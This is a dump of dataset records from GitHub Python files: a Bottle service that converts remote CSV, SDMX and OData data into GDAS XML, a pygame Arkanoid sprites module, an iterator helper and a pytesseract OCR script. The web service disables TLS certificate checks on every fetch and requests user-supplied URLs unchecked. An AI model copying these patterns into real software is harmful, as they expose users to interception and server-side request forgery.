"app.models.Room", "line_number": 30, "usage_type": "name"}]}
framework from remote server and return as XML element.\"\"\"\n payload = {'service': 'TJS',\n 'version': '1.0.0',\n 'request': 'DescribeFrameworks',\n 'FrameworkURI': framework_uri}\n y = requests.get(tjs_url, params=payload, verify=False)\n xml = etree.fromstring(y.content)\n xml_temp = etree.tostring(xml[0])\n # Quick&dirty removal of namespace prefix\n root = xml_temp.replace(b'ns0:', b'')\n parser = etree.XMLParser(ns_clean=True, encoding='utf-8')\n framework = etree.fromstring(root, parser=parser)\n\n return framework\n\n\ndef get_csv(csv_url, csv_key):\n \"\"\"Fetch and proces external CSV-file and return dataset XML fragment.\"\"\"\n y = requests.get(csv_url, verify=False)\n f = io.BytesIO(y.content)\n\n table_set = mt.CSVTableSet(f)\n row_set = table_set.tables[0]\n offset, headers = mt.headers_guess(row_set.sample)\n row_set.register_processor(mt.headers_processor(headers))\n row_set.register_processor(mt.offset_processor(offset + 1))\n types = mt.type_guess(row_set.sample, strict=True)\n row_set.register_processor(mt.types_processor(types))\n\n # Get dataset title from filename\n dataset_title = re.split('\\.|\\/', csv_url)[-2]\n\n dataset = etree.Element(\"Dataset\")\n etree.SubElement(dataset, \"DatasetURI\").text = 'N_A'\n etree.SubElement(dataset, \"Organization\").text = 'N_A'\n etree.SubElement(dataset, \"Title\").text = dataset_title[:25]\n etree.SubElement(dataset, \"Abstract\").text = 'N_A'\n etree.SubElement(dataset, \"ReferenceDate\").text = 'N_A'\n etree.SubElement(dataset, \"Version\").text = '0'\n etree.SubElement(dataset, \"Documentation\").text = 'N_A'\n columnset = etree.SubElement(dataset, \"Columnset\")\n fkey = etree.SubElement(\n columnset,\n \"FrameworkKey\",\n complete=\"true\",\n relationship=\"one\")\n attrib = etree.SubElement(columnset, \"Attributes\")\n\n for header in (row_set.sample.__next__()):\n header_type = type(header.type).__name__.lower()[:-4]\n if header.column == csv_key:\n col = etree.SubElement(\n fkey,\n \"Column\",\n name=header.column,\n type=\"http://www.w3.org/TR/xmlschema-2/#\" + header_type,\n length=\"255\")\n else:\n col = etree.SubElement(\n attrib,\n \"Column\",\n name=header.column,\n type=\"http://www.w3.org/TR/xmlschema-2/#\" + header_type,\n length=\"255\")\n etree.SubElement(col, \"Title\").text = \"N_A\"\n etree.SubElement(col, \"Abstract\").text = \"N_A\"\n rowset = etree.SubElement(dataset, \"Rowset\")\n\n # For some reason the offset doesn't work, so we skip the headers with\n # a workaround\n iter_rows = iter(row_set)\n next(iter_rows)\n for row in iter_rows:\n rw = etree.SubElement(rowset, \"Row\")\n for cell in row:\n if cell.column == csv_key:\n k = etree.Element(\"K\")\n k.text = str(cell.value)\n rw.insert(0, k)\n else:\n k = etree.SubElement(rw, \"V\")\n k.text = str(cell.value)\n\n return dataset\n\n\ndef get_sdmx(sdmx_url):\n \"\"\"Fetch and proces external SDMX-file and return dataset XML fragment.\"\"\"\n y = requests.get(sdmx_url, verify=False)\n xml = etree.fromstring(y.content)\n xslt_root = etree.parse(\"xslt/sdmx-gdas.xsl\")\n transform = etree.XSLT(xslt_root)\n dataset = etree.fromstring(str((transform(xml))))\n\n return dataset\n\n\ndef get_odata(odata_url):\n \"\"\"Fetch and proces external ODATA-file and return dataset XML fragment.\"\"\"\n y = requests.get(odata_url, verify=False)\n data = y.json()\n # Get root_url\n root_url = data['odata.metadata'].split('$')[0]\n # Get TableInfos\n dataset = etree.Element(\"Dataset\")\n y = requests.get(root_url + 'TableInfos', verify=False)\n tbl = 
y.json()['value'][0]\n etree.SubElement(dataset, \"DatasetURI\").text = odata_url\n etree.SubElement(dataset, \"Organization\").text = tbl['Catalog']\n etree.SubElement(dataset, \"Title\").text = tbl['Title']\n etree.SubElement(dataset, \"Abstract\").text = tbl['Summary']\n etree.SubElement(dataset, \"ReferenceDate\").text = tbl['Period']\n etree.SubElement(dataset, \"Version\").text = '0'\n etree.SubElement(dataset, \"Documentation\").text = 'N_A'\n\n # Construct filter for DataProperties\n odata_keys = (data['value'][0].keys())\n\n odata_key_filter = \"Type ne 'TopicGroup' and (Type eq 'GeoDimension'\"\n odata_key_filter += \" or Type eq 'GeoDetail'\"\n\n for key in odata_keys:\n odata_key_filter += \" or Key eq '{0}'\".format(key)\n odata_key_filter += ')'\n\n # Get DataProperties\n y = requests.get(root_url +\n 'DataProperties?$filter=' + odata_key_filter, verify=False)\n\n data_properties = y.json()\n columnset = etree.SubElement(dataset, \"Columnset\")\n fkey = etree.SubElement(\n columnset,\n \"FrameworkKey\",\n complete=\"true\",\n relationship=\"one\")\n attrib = etree.SubElement(columnset, \"Attributes\")\n col_pos = []\n for column in data_properties['value']:\n if column['Type'] in ('GeoDimension', 'GeoDetail'):\n col = etree.SubElement(\n fkey,\n \"Column\",\n name=column['Key'],\n type=\"http://www.w3.org/TR/xmlschema-2/#string\",\n length=\"255\")\n col_pos.insert(0, [column['Position'], column['Key'], 'K'])\n else:\n col = etree.SubElement(\n attrib,\n \"Column\",\n name=column['Key'],\n type=\"http://www.w3.org/TR/xmlschema-2/#string\",\n length=\"255\")\n etree.SubElement(col, \"Title\").text = column['Title']\n etree.SubElement(col, \"Abstract\").text = column['Description']\n col_pos.append([column['Position'], column['Key'], 'V'])\n rowset = etree.SubElement(dataset, \"Rowset\")\n rows = data['value']\n for row in rows:\n rw = etree.SubElement(rowset, \"Row\")\n for col in col_pos:\n k = etree.SubElement(rw, col[2])\n k.text = xstr(row[col[1]])\n\n return dataset\n\n\n@app.route('/', method='GET')\ndef index():\n return index_html\n\n\n@app.route('/convert/', method='GET')\ndef convert(filetype):\n tjs_url = request.params.tjs_url\n framework_uri = request.params.framework_uri\n dataset_url = request.params.dataset_url\n dataset_key = request.params.dataset_key\n\n if filetype not in ('sdmx', 'odata', 'csv'):\n abort(404, 'No valid endpoint. Must be: sdmx, odata or csv')\n\n if tjs_url is None or tjs_url == '':\n abort(400, \"tjs_url must have a value\")\n\n if framework_uri is None or framework_uri == '':\n abort(400, \"framework_uri must have a value\")\n\n if dataset_url is None or dataset_url == '':\n abort(400, \"dataset_url must have a value\")\n\n if filetype == 'csv' and (dataset_key is None or dataset_key == ''):\n abort(400, \"dataset_key must have a value\")\n\n logging.info('tjs_url: ' + tjs_url)\n logging.info('framework_uri: ' + framework_uri)\n logging.info('dataset_url: ' + dataset_url)\n logging.info('dataset_key: ' + dataset_key)\n\n # Setup XML elements\n root = etree.Element(\n \"GDAS\",\n version=\"1.0\",\n service=\"TJS\",\n capabilities=\"http://sis.agr.gc.ca/pls/meta/tjs_1x0_getcapabilities\",\n xmlns=\"http://www.opengis.net/tjs/1.0\")\n\n try:\n framework = get_framework(tjs_url, framework_uri)\n\n except Exception as err:\n logging.error(err)\n abort(500, 'Error getting framework from TJS. 
'\n 'Please check tjs_url and framework_uri')\n\n root.append(framework)\n\n try:\n if filetype == 'sdmx':\n dataset = get_sdmx(dataset_url)\n elif filetype == 'odata':\n dataset = get_odata(dataset_url)\n elif filetype == 'csv':\n dataset = get_csv(dataset_url, dataset_key)\n except Exception as err:\n logging.error(err)\n abort(500, 'Error getting dataset. '\n 'Please check dataset_url')\n\n root[0].append(dataset)\n\n response.content_type = 'application/xml'\n return etree.tostring(root)\n\nrun(app, host=cfg['host'], port=cfg['port'], server='waitress')\n", "repo_name": "joostvenema/to-gdas", "sub_path": "webapp.py", "file_name": "webapp.py", "file_ext": "py", "file_size_in_byte": 9215, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 23, "usage_type": "call"}, {"api_name": "markdown.markdown", "line_number": 27, "usage_type": "call"}, {"api_name": "bottle.Bottle", "line_number": 29, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 47, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 47, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 48, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 48, "usage_type": "name"}, {"api_name": "lxml.etree.XMLParser", "line_number": 51, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 51, "usage_type": "name"}, {"api_name": "lxml.etree.fromstring", "line_number": 52, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 52, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 59, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 60, "usage_type": "call"}, {"api_name": "messytables.CSVTableSet", "line_number": 62, "usage_type": "call"}, {"api_name": "messytables.headers_guess", "line_number": 64, "usage_type": "call"}, {"api_name": "messytables.headers_processor", "line_number": 65, "usage_type": "call"}, {"api_name": "messytables.offset_processor", "line_number": 66, "usage_type": "call"}, {"api_name": "messytables.type_guess", "line_number": 67, "usage_type": "call"}, {"api_name": "messytables.types_processor", "line_number": 68, "usage_type": "call"}, {"api_name": "re.split", "line_number": 71, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 73, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 73, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 74, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 74, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 75, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 75, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 76, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 76, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 77, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 77, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 78, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 78, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 79, "usage_type": "call"}, {"api_name": 
"lxml.etree", "line_number": 79, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 80, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 80, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 81, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 81, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 82, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 82, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 87, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 87, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 92, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 92, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 99, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 99, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 105, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 105, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 106, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 106, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 107, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 107, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 114, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 114, "usage_type": "name"}, {"api_name": "lxml.etree.Element", "line_number": 117, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 117, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 121, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 121, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 129, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 130, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 130, "usage_type": "name"}, {"api_name": "lxml.etree.parse", "line_number": 131, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 131, "usage_type": "name"}, {"api_name": "lxml.etree.XSLT", "line_number": 132, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 132, "usage_type": "name"}, {"api_name": "lxml.etree.fromstring", "line_number": 133, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 133, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 140, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 145, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 145, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 146, "usage_type": "call"}, {"api_name": "lxml.etree.SubElement", "line_number": 148, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 148, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 149, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 149, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 150, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 150, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 151, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 151, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 152, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 152, 
"usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 153, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 153, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 154, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 154, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 167, "usage_type": "call"}, {"api_name": "lxml.etree.SubElement", "line_number": 171, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 171, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 172, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 172, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 177, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 177, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 181, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 181, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 189, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 189, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 195, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 195, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 196, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 196, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 198, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 198, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 201, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 201, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 203, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 203, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 216, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 216, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 217, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 217, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 218, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 218, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 219, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 219, "usage_type": "name"}, {"api_name": "bottle.abort", "line_number": 222, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 225, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 228, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 231, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 234, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 236, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 237, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 238, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 239, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 242, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 242, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 253, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 254, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 267, "usage_type": 
"call"}, {"api_name": "bottle.abort", "line_number": 268, "usage_type": "call"}, {"api_name": "bottle.response.content_type", "line_number": 273, "usage_type": "attribute"}, {"api_name": "bottle.response", "line_number": 273, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 274, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 274, "usage_type": "name"}, {"api_name": "bottle.run", "line_number": 276, "usage_type": "call"}]} +{"seq_id": "33544801539", "text": "import pygame\nfrom settings import *\nfrom pygame import Vector2\nimport random\n\n\nclass Brick(pygame.sprite.Sprite):\n def __init__(self, game, x, y, drop):\n self.groups = game.bricks\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.drop = drop\n if drop:\n self.image = random.choice(game.glossy_brick_images)\n self.rect = self.image.get_rect()\n else:\n self.image = random.choice(game.brick_images)\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x, y)\n \n def destroy(self):\n self.game.break_fx.play()\n self.kill()\n \n def drop_powerup(self):\n if self.drop:\n Item(self.game, self.rect.centerx, self.rect.centery)\n\n \nclass Item(pygame.sprite.Sprite):\n def __init__(self,game, x, y):\n self.groups = game.items\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.powerup_img\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x,y)\n self.velocity = Vector2(0, 100)\n \n def update(self):\n self.rect.centerx += self.velocity.x \n self.rect.centery += 1\n self.check_hits()\n\n def check_hits(self):\n hits = pygame.sprite.spritecollide(self, self.game.players, False)\n if len(hits) > 0:\n self.picked_by()\n self.kill()\n self.game.powerup_fx.play()\n\n def picked_by(self):\n self.game.powerup_multiball()\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, game, x , y):\n self.game = game\n self.groups = game.players\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.image = game.pad_img\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x, y)\n self.velocity = Vector2(0, 0)\n self.acceleration = 0\n\n def update(self):\n self.keyboard_input()\n self.move()\n\n def move(self):\n self.velocity.x += self.acceleration * self.game.dt\n if self.velocity.magnitude() > PAD_MAX_SPEED:\n self.velocity.scale_to_length(PAD_MAX_SPEED)\n self.rect.centerx += self.velocity.x * self.game.dt\n self.velocity -= Vector2(self.velocity.x * DRAG * self.game.dt, 0)\n if self.velocity.magnitude() < 20:\n self.velocity.x = 0\n if self.rect.left < TILE_SIZE:\n self.rect.left = TILE_SIZE\n self.velocity.x = 0\n if self.rect.right > WIDTH - TILE_SIZE:\n self.rect.right = WIDTH - TILE_SIZE\n self.velocity.x = 0\n\n def hit(self, ball):\n offset = (ball.rect.centerx - self.rect.centerx) / (self.rect.width//2)\n ball.velocity.x = offset\n ball.rect.bottom = self.rect.top\n \n def keyboard_input(self):\n keystate = pygame.key.get_pressed()\n self.acceleration = 0\n if keystate[pygame.K_LEFT]:\n self.acceleration = -PAD_MAX_ACCEL\n if keystate[pygame.K_RIGHT]:\n self.acceleration = PAD_MAX_ACCEL\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.balls\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = game.ball_img\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x, y)\n self.velocity = Vector2(0, 0)\n self.is_asleep = True\n self.push = 0\n\n def bounce(self, thing):\n if self.velocity.magnitude() == 
0:\n return\n velocity = self.velocity.normalize()\n is_vertical_bounce = velocity.x == 0\n if velocity.x != 0:\n v_slope = -velocity.y / velocity.x\n corner = thing.rect.center\n if v_slope > 0 and velocity.x > 0: # Q1 bottom left\n corner = thing.rect.bottomleft\n if v_slope < 0 and velocity.x < 0: # Q2 bottom right\n corner = thing.rect.bottomright\n if v_slope > 0 and velocity.x < 0: # Q3 top right\n corner = thing.rect.topright\n if v_slope < 0 and velocity.x > 0: # Q4 top left\n corner = thing.rect.topleft\n towards_thing = (Vector2(corner) -\n Vector2(self.rect.center))\n if towards_thing.magnitude() == 0:\n return\n towards_thing = towards_thing.normalize()\n if towards_thing.x == 0:\n is_vertical_bounce = True\n else:\n t_slope = towards_thing.y / towards_thing.x\n is_vertical_bounce = abs(v_slope) > abs(t_slope)\n if is_vertical_bounce:\n self.velocity.y *= -1\n else:\n self.velocity.x *= -1\n self.game.bounce_fx.play()\n self.push = 500\n \n def update(self):\n if self.is_asleep:\n if self.game.player.acceleration != 0 and self.game.player.velocity.magnitude() != 0:\n self.velocity = self.game.player.velocity.normalize() + Vector2(0, -1)\n self.is_asleep = False\n return\n\n if self.velocity.magnitude() != 0:\n self.rect.center += self.velocity.normalize() * (BALL_SPEED + self.push) * self.game.dt\n self.push *= 0.9\n\n if self.rect.right > WIDTH - TILE_SIZE:\n self.rect.right = WIDTH - TILE_SIZE\n self.velocity.x *= -1\n\n if self.rect.left < 0 + TILE_SIZE:\n self.rect.left = 0 + TILE_SIZE\n self.velocity.x *= -1\n\n if self.rect.top < 0 + TILE_SIZE:\n self.rect.top = 0 + TILE_SIZE\n self.velocity.y *= -1\n\n if self.rect.centery > HEIGHT:\n self.kill()\n self.game.any_ball_alive()\n\n\nclass Wall(pygame.sprite.Sprite):\n def __init__(self, game, x, y, stage):\n self.groups = game.walls\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n if stage == 1:\n self.image = game.stage1_border\n self.rect = self.image.get_rect()\n elif stage == 2:\n self.image = game.stage2_border\n self.rect = self.image.get_rect()\n elif stage == 3:\n self.image = game.stage3_border\n self.rect = self.image.get_rect()\n else:\n self.image = game.stage4_border\n self.rect = self.image.get_rect()\n self.rect.x = x * TILE_SIZE\n self.rect.y = y * TILE_SIZE\n\n\nclass BackGround(pygame.sprite.Sprite):\n def __init__(self, game):\n pygame.sprite.Sprite.__init__(self)\n self.game = game\n if game.stage == 0:\n self.image = game.wallpaper_img\n self.rect = self.image.get_rect()\n if game.stage == 1:\n self.image = game.bg_1_img\n self.rect = self.image.get_rect()\n if game.stage == 2:\n self.image = game.bg_2_img\n self.rect = self.image.get_rect()\n if game.stage == 3:\n self.image = game.bg_3_img\n self.rect = self.image.get_rect()\n if game.stage == 4:\n self.image = game.bg_4_img\n self.rect = self.image.get_rect()\n if game.stage == 5:\n self.image = game.victory_img\n self.rect = self.image.get_rect()", "repo_name": "viicttor96/Practica-Arkanoid-Python", "sub_path": "sprites.py", "file_name": "sprites.py", "file_ext": "py", "file_size_in_byte": 7335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.sprite", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}, 
{"api_name": "random.choice", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.Vector2", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.Vector2", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.key.get_pressed", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.Vector2", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 108, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 129, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 196, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 196, "usage_type": "attribute"}]} +{"seq_id": "13588000979", "text": "\"\"\"Iterator utilities.\"\"\"\nimport itertools\n\n\ndef chunker(iterable, chunk_size):\n \"\"\"\n A chunker for iterators.\n\n Args:\n iterable (iterable-like): the iterable to be chunked.\n chunk_size (int): size of the chunk.\n Returns:\n A chunked iterator.\n \"\"\"\n iterator = iter(iterable)\n while True:\n chunk = tuple(\n itertools.islice(\n iterator,\n chunk_size\n )\n )\n if not chunk:\n return\n yield chunk\n", "repo_name": "drugilsberg/uniprot_fasta_parser", "sub_path": "upfp/iterator.py", "file_name": "iterator.py", "file_ext": "py", "file_size_in_byte": 514, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.islice", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "73888222564", "text": "# -*- coding:utf-8 -*-\n# @Time : 2020/5/29 10:11 \n# @Author : litao\n\nfrom PIL import Image\nimport pytesseract,os,re\nimport 
cv2\nimport argparse\nimport cv2\nimport os\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--preprocess\", type=str, default=\"thresh\",\n\thelp=\"type of preprocessing to be done\")\nargs = vars(ap.parse_args())\nclass Languages:\n CHS = 'chi_sim'\n ENG = 'eng'\n\ndef img_to_str(image_path, lang=Languages.CHS):\n # img = Image.open(image_path)\n # width, height = img.size\n # img.show()\n # mode = img.mode\n\n # print(img.size)\n # thumb = img.crop((10,42,160,150))\n # img.grab(0,0,250,200)\n # thumb.save(\"thumb.jpg\")\n # image = cv2.imread(image_path)\n # gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # # check to see if we should apply thresholding to preprocess the\n # # image\n # if args[\"preprocess\"] == \"thresh\":\n # gray = cv2.threshold(gray, 0, 255,\n # cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n # # make a check to see if median blurring should be done to remove\n # # noise\n # elif args[\"preprocess\"] == \"blur\":\n # gray = cv2.medianBlur(gray, 3)\n # # write the grayscale image to disk as a temporary file so we can\n # # apply OCR to it\n # filename = \"thumb.png\"\n # cv2.imwrite(filename, gray)\n # thumb = img.crop((40, 30, 100, 70))\n #img.grab((30, 30, 150, 80))\n # thumb.save(\"thumb.jpg\")\n # ,config=\"-psm 7 digits\"\n img = Image.open(image_path)\n # thumb = img.crop((10,42,160,150))\n # thumb = img.crop((40, 30, 100, 70))\n thumb = img.crop((490, 0, 560, 60))\n thumb.save(\"thumb.jpg\")\n return pytesseract.image_to_string(thumb, lang,config=\"-psm 7 digits\")\n\ndef file_path_scan(file_path):\n for filename in os.listdir(file_path):\n path = os.path.join(file_path, filename)\n if not os.path.isfile(path):\n continue\n title = img_to_str(path, lang=Languages.CHS)\n print(title)\n try:\n play_count = re.findall(\"\\d+\",title)[0]\n #print(play_count)\n except:\n #print(title)\n play_count= 0\n yield filename,play_count\n\n\nfile_path = r'D:\\work_file\\word_file_new\\litao\\num'\nfor filename,play_count in file_path_scan(file_path):\n time_str = filename.replace(\".png\",\"\")\n time_str = time_str[0:13] +\":\"+ time_str[13:15]+\":\"+ time_str[15:]\n # print(time_str)\n print(time_str,play_count)\n\n# print(img_to_str(r'D:\\work_file\\word_file_new\\litao\\screen\\2020-04-16 202632.png', lang=Languages.CHS))", "repo_name": "litaolemo/crawler", "sub_path": "crawler_sys/tools/ocr_by_img.py", "file_name": "ocr_by_img.py", "file_ext": "py", "file_size_in_byte": 2602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 54, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 57, "usage_type": "call"}, {"api_name": 